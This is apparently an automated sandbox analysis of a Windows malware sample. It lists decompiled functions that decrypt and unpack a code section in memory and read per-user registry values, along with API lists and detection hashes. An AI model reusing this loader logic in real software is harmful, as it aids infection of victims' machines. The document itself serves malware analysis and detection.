                                                                                                                                                                                                                                          							_t54 = 0;
                                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                                          							if(0 == 0) {
                                                                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                                                                          								E011293D5( ~_v8 &  *0x112d270, 0x112d00c); // executed
                                                                                                                                                                                                                                          								_t54 = E011298F7(0, _t55, _t63, 0x112d00c);
                                                                                                                                                                                                                                          								__eflags = _t54;
                                                                                                                                                                                                                                          								if(_t54 != 0) {
                                                                                                                                                                                                                                          									goto L30;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t43 = E0112205B(_t55); // executed
                                                                                                                                                                                                                                          								__eflags = _t43;
                                                                                                                                                                                                                                          								if(_t43 != 0) {
                                                                                                                                                                                                                                          									__eflags = _v8;
                                                                                                                                                                                                                                          									_t67 = _v12;
                                                                                                                                                                                                                                          									if(_v8 != 0) {
                                                                                                                                                                                                                                          										L29:
                                                                                                                                                                                                                                          										_t44 = E01129B6F(_t61, _t67, _v8); // executed
                                                                                                                                                                                                                                          										_t54 = _t44;
                                                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									__eflags = _t67;
                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									_t46 = E01126CD3(__eflags,  &(_t67[4])); // executed
                                                                                                                                                                                                                                          									_t54 = _t46;
                                                                                                                                                                                                                                          									__eflags = _t54;
                                                                                                                                                                                                                                          									if(_t54 == 0) {
                                                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									goto L29;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t54 = 8;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t68 = _v12;
                                                                                                                                                                                                                                          						if(_t68 == 0) {
                                                                                                                                                                                                                                          							L30:
                                                                                                                                                                                                                                          							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                          								 *0x112d160();
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L34;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t69 =  &(_t68[4]);
                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                          						} while (E01127827(_t63, _t69, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L30;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t54 = _t22;
                                                                                                                                                                                                                                          					L34:
                                                                                                                                                                                                                                          					return _t54;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                                          0x01124908
                                                                                                                                                                                                                                          0x01124912
                                                                                                                                                                                                                                          0x01124915
                                                                                                                                                                                                                                          0x01124918
                                                                                                                                                                                                                                          0x0112491b
                                                                                                                                                                                                                                          0x01124922
                                                                                                                                                                                                                                          0x01124924
                                                                                                                                                                                                                                          0x01124930
                                                                                                                                                                                                                                          0x01124932
                                                                                                                                                                                                                                          0x01124932
                                                                                                                                                                                                                                          0x0112493b
                                                                                                                                                                                                                                          0x01124941
                                                                                                                                                                                                                                          0x01124946
                                                                                                                                                                                                                                          0x01124960
                                                                                                                                                                                                                                          0x0112496c
                                                                                                                                                                                                                                          0x0112496e
                                                                                                                                                                                                                                          0x01124973
                                                                                                                                                                                                                                          0x0112497d
                                                                                                                                                                                                                                          0x0112497d
                                                                                                                                                                                                                                          0x01124975
                                                                                                                                                                                                                                          0x01124975
                                                                                                                                                                                                                                          0x01124975
                                                                                                                                                                                                                                          0x01124975
                                                                                                                                                                                                                                          0x01124984
                                                                                                                                                                                                                                          0x01124991
                                                                                                                                                                                                                                          0x01124998
                                                                                                                                                                                                                                          0x0112499d
                                                                                                                                                                                                                                          0x0112499d
                                                                                                                                                                                                                                          0x011249a6
                                                                                                                                                                                                                                          0x011249a9
                                                                                                                                                                                                                                          0x011249cf
                                                                                                                                                                                                                                          0x011249db
                                                                                                                                                                                                                                          0x011249e0
                                                                                                                                                                                                                                          0x011249e5
                                                                                                                                                                                                                                          0x011249e7
                                                                                                                                                                                                                                          0x01124a13
                                                                                                                                                                                                                                          0x01124a15
                                                                                                                                                                                                                                          0x011249e9
                                                                                                                                                                                                                                          0x011249ed
                                                                                                                                                                                                                                          0x011249f2
                                                                                                                                                                                                                                          0x011249f7
                                                                                                                                                                                                                                          0x011249fe
                                                                                                                                                                                                                                          0x01124a04
                                                                                                                                                                                                                                          0x01124a09
                                                                                                                                                                                                                                          0x01124a0f
                                                                                                                                                                                                                                          0x01124a16
                                                                                                                                                                                                                                          0x01124a18
                                                                                                                                                                                                                                          0x01124a1a
                                                                                                                                                                                                                                          0x01124a29
                                                                                                                                                                                                                                          0x01124a2f
                                                                                                                                                                                                                                          0x01124a34
                                                                                                                                                                                                                                          0x01124a36
                                                                                                                                                                                                                                          0x01124a66
                                                                                                                                                                                                                                          0x01124a68
                                                                                                                                                                                                                                          0x01124a38
                                                                                                                                                                                                                                          0x01124a38
                                                                                                                                                                                                                                          0x01124a3e
                                                                                                                                                                                                                                          0x01124a4b
                                                                                                                                                                                                                                          0x01124a51
                                                                                                                                                                                                                                          0x01124a51
                                                                                                                                                                                                                                          0x01124a59
                                                                                                                                                                                                                                          0x01124a62
                                                                                                                                                                                                                                          0x01124a69
                                                                                                                                                                                                                                          0x01124a6b
                                                                                                                                                                                                                                          0x01124a6d
                                                                                                                                                                                                                                          0x01124a74
                                                                                                                                                                                                                                          0x01124a81
                                                                                                                                                                                                                                          0x01124a8b
                                                                                                                                                                                                                                          0x01124a8d
                                                                                                                                                                                                                                          0x01124a8f
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01124a91
                                                                                                                                                                                                                                          0x01124a96
                                                                                                                                                                                                                                          0x01124a98
                                                                                                                                                                                                                                          0x01124a9f
                                                                                                                                                                                                                                          0x01124aa3
                                                                                                                                                                                                                                          0x01124aa6
                                                                                                                                                                                                                                          0x01124abb
                                                                                                                                                                                                                                          0x01124abf
                                                                                                                                                                                                                                          0x01124ac4
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01124ac4
                                                                                                                                                                                                                                          0x01124aa8
                                                                                                                                                                                                                                          0x01124aaa
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01124ab0
                                                                                                                                                                                                                                          0x01124ab5
                                                                                                                                                                                                                                          0x01124ab7
                                                                                                                                                                                                                                          0x01124ab9
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01124ab9
                                                                                                                                                                                                                                          0x01124a9c
                                                                                                                                                                                                                                          0x01124a9c
                                                                                                                                                                                                                                          0x01124a6d
                                                                                                                                                                                                                                          0x011249ab
                                                                                                                                                                                                                                          0x011249ab
                                                                                                                                                                                                                                          0x011249b0
                                                                                                                                                                                                                                          0x01124ac6
                                                                                                                                                                                                                                          0x01124acb
                                                                                                                                                                                                                                          0x01124ad3
                                                                                                                                                                                                                                          0x01124ad3
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01124acb
                                                                                                                                                                                                                                          0x011249b6
                                                                                                                                                                                                                                          0x011249b9
                                                                                                                                                                                                                                          0x011249c3
                                                                                                                                                                                                                                          0x011249ca
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01124adb
                                                                                                                                                                                                                                          0x01124adb
                                                                                                                                                                                                                                          0x01124ade
                                                                                                                                                                                                                                          0x01124ae2
                                                                                                                                                                                                                                          0x01124ae2

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 011211AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,01124920,00000001), ref: 011211BE
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 0112499D
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • memset.NTDLL ref: 011249ED
                                                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(05649570), ref: 011249FE
                                                                                                                                                                                                                                            • Part of subcall function 01126CD3: memset.NTDLL ref: 01126CED
                                                                                                                                                                                                                                            • Part of subcall function 01126CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 01126D24
                                                                                                                                                                                                                                            • Part of subcall function 01126CD3: StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,01124AB5), ref: 01126D2F
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 01124A29
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 01124A59
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4246211962-0
                                                                                                                                                                                                                                          • Opcode ID: 2541e36c79dcfbe56558407eb19345b8082e039c7d909fa4256bd025ed83e2e4
                                                                                                                                                                                                                                          • Instruction ID: 90f4488496fb7603a530890312b41be604c769f6ae3e082beb9fa6cbe0faa1d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2541e36c79dcfbe56558407eb19345b8082e039c7d909fa4256bd025ed83e2e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C51D471A00235BFEF3DEFE8E848B5E77A8AB08B14F140525E212D7584E77499748B58
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                          			E01126CD3(void* __eflags, WCHAR* _a4) {
                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                          				void _v48;
                                                                                                                                                                                                                                          				int _v52;
                                                                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                                          				void* _v64;
                                                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                          				WCHAR* _v84;
                                                                                                                                                                                                                                          				intOrPtr _v88;
                                                                                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                                                                                          				int _t45;
                                                                                                                                                                                                                                          				char _t50;
                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                                          				WCHAR* _t90;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_v52 = 0;
                                                                                                                                                                                                                                          				memset( &_v48, 0, 0x2c);
                                                                                                                                                                                                                                          				_v76 = 0;
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				_t40 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t5 = _t40 + 0x112ee24; // 0x410025
                                                                                                                                                                                                                                          				_t90 = E01124814(_t5);
                                                                                                                                                                                                                                          				_v84 = _t90;
                                                                                                                                                                                                                                          				if(_t90 == 0) {
                                                                                                                                                                                                                                          					_t81 = 8;
                                                                                                                                                                                                                                          					L24:
                                                                                                                                                                                                                                          					return _t81;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                                                                                                                                                                                                                          				if(_t45 != 0) {
                                                                                                                                                                                                                                          					_t81 = 1;
                                                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                                                          					E0112147E(_v88);
                                                                                                                                                                                                                                          					goto L24;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(E01129138(0,  &_v96) != 0) {
                                                                                                                                                                                                                                          					_v96 = 0;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t50 = E0112A5E9(0,  *0x112d33c);
                                                                                                                                                                                                                                          				_v96 = _t50;
                                                                                                                                                                                                                                          				if(_t50 == 0) {
                                                                                                                                                                                                                                          					_t81 = 8;
                                                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t52 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t11 = _t52 + 0x112e81a; // 0x65696c43
                                                                                                                                                                                                                                          					_t55 = E0112A5E9(0, _t11);
                                                                                                                                                                                                                                          					_t93 = _t55;
                                                                                                                                                                                                                                          					if(_t55 == 0) {
                                                                                                                                                                                                                                          						_t81 = 8;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t81 = E011274B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                                                                                                                                                                                                                          						E0112147E(_t93);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t81 != 0) {
                                                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                                                          						E0112147E(_v92);
                                                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                                                          						_t92 = _v96;
                                                                                                                                                                                                                                          						if(_v96 != 0) {
                                                                                                                                                                                                                                          							E0112568A(_t92);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						if(( *0x112d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                                                          							E01126E92(_t81, _v60, _v56,  *0x112d270, 0);
                                                                                                                                                                                                                                          							_t81 = E01126737(_v72,  &_v64,  &_v60, 0);
                                                                                                                                                                                                                                          							if(_t81 == 0) {
                                                                                                                                                                                                                                          								_v68 = _v96;
                                                                                                                                                                                                                                          								_v64 =  &_v60;
                                                                                                                                                                                                                                          								_t81 = E011272F2( &_v84, 0);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							E0112147E(_v60);
                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t67 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          						_t18 = _t67 + 0x112e823; // 0x65696c43
                                                                                                                                                                                                                                          						_t70 = E0112A5E9(0, _t18);
                                                                                                                                                                                                                                          						_t95 = _t70;
                                                                                                                                                                                                                                          						if(_t70 == 0) {
                                                                                                                                                                                                                                          							_t81 = 8;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t22 =  &_v96; // 0x65696c43
                                                                                                                                                                                                                                          							_t81 = E011274B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                                                                                                                                                                                                                          							E0112147E(_t95);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						if(_t81 != 0) {
                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                          0x01126ce9
                                                                                                                                                                                                                                          0x01126ced
                                                                                                                                                                                                                                          0x01126cf4
                                                                                                                                                                                                                                          0x01126cfc
                                                                                                                                                                                                                                          0x01126cfd
                                                                                                                                                                                                                                          0x01126cfe
                                                                                                                                                                                                                                          0x01126cff
                                                                                                                                                                                                                                          0x01126d00
                                                                                                                                                                                                                                          0x01126d01
                                                                                                                                                                                                                                          0x01126d09
                                                                                                                                                                                                                                          0x01126d15
                                                                                                                                                                                                                                          0x01126d17
                                                                                                                                                                                                                                          0x01126d1d
                                                                                                                                                                                                                                          0x01126e86
                                                                                                                                                                                                                                          0x01126e87
                                                                                                                                                                                                                                          0x01126e8f
                                                                                                                                                                                                                                          0x01126e8f
                                                                                                                                                                                                                                          0x01126d2f
                                                                                                                                                                                                                                          0x01126d37
                                                                                                                                                                                                                                          0x01126e78
                                                                                                                                                                                                                                          0x01126e79
                                                                                                                                                                                                                                          0x01126e7d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126e7d
                                                                                                                                                                                                                                          0x01126d4a
                                                                                                                                                                                                                                          0x01126d4c
                                                                                                                                                                                                                                          0x01126d4c
                                                                                                                                                                                                                                          0x01126d58
                                                                                                                                                                                                                                          0x01126d5d
                                                                                                                                                                                                                                          0x01126d63
                                                                                                                                                                                                                                          0x01126e66
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126d69
                                                                                                                                                                                                                                          0x01126d69
                                                                                                                                                                                                                                          0x01126d6e
                                                                                                                                                                                                                                          0x01126d77
                                                                                                                                                                                                                                          0x01126d7c
                                                                                                                                                                                                                                          0x01126d85
                                                                                                                                                                                                                                          0x01126dac
                                                                                                                                                                                                                                          0x01126d87
                                                                                                                                                                                                                                          0x01126da1
                                                                                                                                                                                                                                          0x01126da3
                                                                                                                                                                                                                                          0x01126da3
                                                                                                                                                                                                                                          0x01126daf
                                                                                                                                                                                                                                          0x01126e59
                                                                                                                                                                                                                                          0x01126e5d
                                                                                                                                                                                                                                          0x01126e67
                                                                                                                                                                                                                                          0x01126e67
                                                                                                                                                                                                                                          0x01126e6d
                                                                                                                                                                                                                                          0x01126e6f
                                                                                                                                                                                                                                          0x01126e6f
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126db5
                                                                                                                                                                                                                                          0x01126dbc
                                                                                                                                                                                                                                          0x01126e01
                                                                                                                                                                                                                                          0x01126e14
                                                                                                                                                                                                                                          0x01126e2d
                                                                                                                                                                                                                                          0x01126e31
                                                                                                                                                                                                                                          0x01126e37
                                                                                                                                                                                                                                          0x01126e3f
                                                                                                                                                                                                                                          0x01126e4e
                                                                                                                                                                                                                                          0x01126e4e
                                                                                                                                                                                                                                          0x01126e54
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126e54
                                                                                                                                                                                                                                          0x01126dbe
                                                                                                                                                                                                                                          0x01126dc3
                                                                                                                                                                                                                                          0x01126dcc
                                                                                                                                                                                                                                          0x01126dd1
                                                                                                                                                                                                                                          0x01126dd5
                                                                                                                                                                                                                                          0x01126dfc
                                                                                                                                                                                                                                          0x01126dd7
                                                                                                                                                                                                                                          0x01126de7
                                                                                                                                                                                                                                          0x01126df1
                                                                                                                                                                                                                                          0x01126df3
                                                                                                                                                                                                                                          0x01126df3
                                                                                                                                                                                                                                          0x01126dff
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126dff
                                                                                                                                                                                                                                          0x01126daf

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.NTDLL ref: 01126CED
                                                                                                                                                                                                                                            • Part of subcall function 01124814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,01126D15,00410025,00000005,?,00000000), ref: 01124825
                                                                                                                                                                                                                                            • Part of subcall function 01124814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 01124842
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 01126D24
                                                                                                                                                                                                                                          • StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,01124AB5), ref: 01126D2F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                                                                                                                                                                                                          • String ID: Clie
                                                                                                                                                                                                                                          • API String ID: 3817122888-1624203186
                                                                                                                                                                                                                                          • Opcode ID: 667688044de5f6b154efc1994dcd1ae7e16b0e5f165c338c59efcfaf9253bbf3
                                                                                                                                                                                                                                          • Instruction ID: bb3dbb58e9f3748512409202f58c5e7ee199d61425846b6ceef7656c86300e88
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 667688044de5f6b154efc1994dcd1ae7e16b0e5f165c338c59efcfaf9253bbf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7541C172504376AFD729EFA4E884D6F7BECAF48218F00492AFA84D7150D770D824CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                          			E00401B6F(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                          				unsigned int _v16;
                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                          				intOrPtr* _v36;
                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                          				signed int _v52;
                                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                          				intOrPtr _t53;
                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                          				intOrPtr _t78;
                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t78 =  *0x404130;
                                                                                                                                                                                                                                          				_t42 = E00401C8A(_t78,  &_v24,  &_v16);
                                                                                                                                                                                                                                          				_v20 = _t42;
                                                                                                                                                                                                                                          				if(_t42 == 0) {
                                                                                                                                                                                                                                          					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                          					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                                                                                                                                                                                                          					_t79 = _t78 + _v24;
                                                                                                                                                                                                                                          					_v40 = _t79;
                                                                                                                                                                                                                                          					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                          					_v28 = _t49;
                                                                                                                                                                                                                                          					if(_t49 == 0) {
                                                                                                                                                                                                                                          						_v20 = 8;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                          						if(_t61 <= 0) {
                                                                                                                                                                                                                                          							_t50 =  *0x404140;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t53 = _t49 - _t79;
                                                                                                                                                                                                                                          							_v32 = _t53;
                                                                                                                                                                                                                                          							_v36 = _t53 + _a4 + 0x4051a2;
                                                                                                                                                                                                                                          							_v12 = _t79;
                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                          								asm("movsd");
                                                                                                                                                                                                                                          								asm("movsd");
                                                                                                                                                                                                                                          								asm("movsd");
                                                                                                                                                                                                                                          								asm("rol edx, cl");
                                                                                                                                                                                                                                          								E00401908(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
                                                                                                                                                                                                                                          								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
                                                                                                                                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                                                                                                                                          								_v12 = _v12 + 0x1000;
                                                                                                                                                                                                                                          								 *0x404140 = _t50;
                                                                                                                                                                                                                                          								if(_v8 >= _t61) {
                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t53 = _v32;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						if(_t50 != 0x59935a40) {
                                                                                                                                                                                                                                          							_v20 = 0xc;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							memcpy(_v40, _v28, _v16);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						VirtualFree(_v28, 0, 0x8000); // executed
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v20;
                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                          0x00401b76
                                                                                                                                                                                                                                          0x00401b86
                                                                                                                                                                                                                                          0x00401b8b
                                                                                                                                                                                                                                          0x00401b90
                                                                                                                                                                                                                                          0x00401ba5
                                                                                                                                                                                                                                          0x00401bac
                                                                                                                                                                                                                                          0x00401bb1
                                                                                                                                                                                                                                          0x00401bc2
                                                                                                                                                                                                                                          0x00401bc5
                                                                                                                                                                                                                                          0x00401bcb
                                                                                                                                                                                                                                          0x00401bd0
                                                                                                                                                                                                                                          0x00401c7a
                                                                                                                                                                                                                                          0x00401bd6
                                                                                                                                                                                                                                          0x00401bd6
                                                                                                                                                                                                                                          0x00401bdc
                                                                                                                                                                                                                                          0x00401c42
                                                                                                                                                                                                                                          0x00401bde
                                                                                                                                                                                                                                          0x00401be1
                                                                                                                                                                                                                                          0x00401beb
                                                                                                                                                                                                                                          0x00401bee
                                                                                                                                                                                                                                          0x00401bf1
                                                                                                                                                                                                                                          0x00401bf9
                                                                                                                                                                                                                                          0x00401c04
                                                                                                                                                                                                                                          0x00401c05
                                                                                                                                                                                                                                          0x00401c06
                                                                                                                                                                                                                                          0x00401c15
                                                                                                                                                                                                                                          0x00401c1e
                                                                                                                                                                                                                                          0x00401c28
                                                                                                                                                                                                                                          0x00401c2b
                                                                                                                                                                                                                                          0x00401c2e
                                                                                                                                                                                                                                          0x00401c35
                                                                                                                                                                                                                                          0x00401c3d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401bf6
                                                                                                                                                                                                                                          0x00401bf6
                                                                                                                                                                                                                                          0x00401c3f
                                                                                                                                                                                                                                          0x00401c4c
                                                                                                                                                                                                                                          0x00401c61
                                                                                                                                                                                                                                          0x00401c4e
                                                                                                                                                                                                                                          0x00401c57
                                                                                                                                                                                                                                          0x00401c5c
                                                                                                                                                                                                                                          0x00401c72
                                                                                                                                                                                                                                          0x00401c72
                                                                                                                                                                                                                                          0x00401c81
                                                                                                                                                                                                                                          0x00401c87

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00401BC5
                                                                                                                                                                                                                                          • memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,004011FF,-00000008), ref: 00401C57
                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401C72
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                          • String ID: Dec 1 2020
                                                                                                                                                                                                                                          • API String ID: 4010158826-3539646581
                                                                                                                                                                                                                                          • Opcode ID: 32c0fd6cd0e560628df818c122f9bc710d565fa041d472fb92a728a2ba1876ef
